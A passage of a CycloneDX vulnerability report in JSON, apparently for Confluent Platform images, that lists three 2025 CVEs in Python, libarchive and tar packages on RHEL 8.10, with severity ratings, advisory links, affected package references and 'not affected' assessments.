          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-6075",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        400
      ],
      "description": "If the value passed to os.path.expandvars() is user-controlled a \nperformance degradation is possible when expanding environment \nvariables.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-6075"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:23342"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19064"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-6075"
        },
        {
          "url": "https://bugzilla.redhat.com/2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294682"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2373234"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2402342"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5642"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6069"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8291"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-19064.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2025:23342"
        },
        {
          "url": "https://github.com/python/cpython/commit/2e6150adccaaf5bd95d4c19dfd04a36e0b325d8c"
        },
        {
          "url": "https://github.com/python/cpython/commit/5dceb93486176e6b4a6d9754491005113eb23427"
        },
        {
          "url": "https://github.com/python/cpython/commit/631ba3407e3348ccd56ce5160c4fb2c5dc5f4d84"
        },
        {
          "url": "https://github.com/python/cpython/commit/892747b4cf0f95ba8beb51c0d0658bfaa381ebca"
        },
        {
          "url": "https://github.com/python/cpython/commit/9ab89c026aa9611c4b0b67c288b8303a480fe742"
        },
        {
          "url": "https://github.com/python/cpython/commit/c8a5f3435c342964e0a432cc9fb448b7dbecd1ba"
        },
        {
          "url": "https://github.com/python/cpython/commit/f029e8db626ddc6e3a3beea4eff511a71aaceb5c"
        },
        {
          "url": "https://github.com/python/cpython/issues/136065"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-6075.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-19177.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/IUP5QJ6D4KK6ULHOMPC7DPNKRYQTQNLA/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-6075"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7886-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7886-2"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8614-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-6075"
        }
      ],
      "published": "2025-10-31T17:15:48+00:00",
      "updated": "2026-07-31T14:16:45+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n        linux-vdso.so.1 (0x0000ffff8cd00000)\n        libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n        libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n        libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n        libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n        /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)"
      }
    },
    {
      "id": "CVE-2025-60753",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        400,
        835
      ],
      "description": "An issue was discovered in libarchive bsdtar before version 3.8.1 in function apply_substitution in file tar/subst.c when processing crafted -s substitution rules. This can cause unbounded memory allocation and lead to denial of service (Out-of-Memory crash).",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-60753"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-60753"
        },
        {
          "url": "https://github.com/Papya-j/CVE/tree/main/CVE-2025-60753"
        },
        {
          "url": "https://github.com/libarchive/libarchive/issues/2725"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-60753"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8147-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-60753"
        }
      ],
      "published": "2025-11-05T16:15:40+00:00",
      "updated": "2026-06-17T09:50:05+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.3.3-7.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libarchive@3.3.3-7.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-64118",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        }
      ],
      "cwes": [
        362,
        367
      ],
      "description": "node-tar is a Tar for Node.js. In 7.5.1, using .t (aka .list) with { sync: true } to read tar entry contents returns uninitialized memory contents if tar file was changed on disk to a smaller size while being read. This vulnerability is fixed in 7.5.2.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-64118"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-64118"
        },
        {
          "url": "https://github.com/isaacs/node-tar"
        },
        {
          "url": "https://github.com/isaacs/node-tar/commit/5330eb04bc43014f216e5c271b40d5c00d45224d"
        },
        {
          "url": "https://github.com/isaacs/node-tar/commit/5e1a8e638600d3c3a2969b4de6a6ec44fa8d74c9"
        },
        {
          "url": "https://github.com/isaacs/node-tar/issues/445"
        },
        {
          "url": "https://github.com/isaacs/node-tar/pull/446"
        },
        {
          "url": "https://github.com/isaacs/node-tar/security/advisories/GHSA-29xp-372q-xqph"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64118"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-64118"
        }
      ],
      "published": "2025-10-30T18:15:33+00:00",
      "updated": "2026-06-17T09:53:51+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2",
          "versions": [
            {
              "version": "2:1.30-11.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/tar@1.30-11.el8_10?arch=x86_64&distro=redhat-8.10&epoch=2"
        },
        {
